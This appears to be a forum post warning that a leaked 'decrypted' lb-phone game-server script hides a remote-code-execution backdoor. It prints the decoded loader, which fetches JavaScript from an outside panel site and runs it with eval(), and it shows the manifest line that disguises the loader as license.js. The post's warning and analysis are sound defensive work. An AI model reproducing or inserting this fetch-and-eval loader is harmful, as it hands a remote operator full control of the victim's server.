Security HUD
System Watchdog
×
Threads Scanned ⟳
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

šŸ“‹ DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

šŸ›”ļø Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new

Script šŸ”„LB-PHONE VALUE = $104.40šŸ”„

grmaaa

Member
Joined
May 27, 2026
Messages
2
Reaction score
4
Points
16
Location
Brazil
āš ļø BACKDOOR FOUND in this lb-phone "Decrypted" leak (v2.3.7) — Remote Code Execution

Server-side RCE backdoor. Confirmed by static analysis.

THE BACKDOOR
File: ui/dist/assets/license.js
It is loaded as a SERVER script in fxmanifest.lua:

server_scripts {
"@oxmysql/lib/MySQL.lua",
"lib/server/**.lua",
"ui/dist/assets/license.js", <-- this line
"server/**/*.lua"
}

The file is obfuscated as base64 chunks that are joined and run with new Function().
Decoded, it is:

https.get(' ', r=>{
let d='';
r.on('data', c=>d+=c);
r.on('end', ()=>eval(d));
})

WHAT IT DOES
On every resource start, your server fetches JavaScript from wasp-panel.com (using a
per-install key) and eval()s it with full Node.js privileges. That is total server
compromise: the operator can run ANY code on your host — steal DB credentials/tokens,
drop more malware, or wipe the server. The "license.js" name is just camouflage; real
lb-phone has no such server script.

SECONDARY (low risk)
server/misc/errors.lua hardcodes a Discord webhook that POSTs error stack traces +
your sv_hostname. leaks server name only, but worth removing.

client.lua is VM-obfuscated and cannot be audited — it CANNOT be cleared as safe, only
buy the official version if you need trust. Do not run cracked scripts on a production
server.
 
Top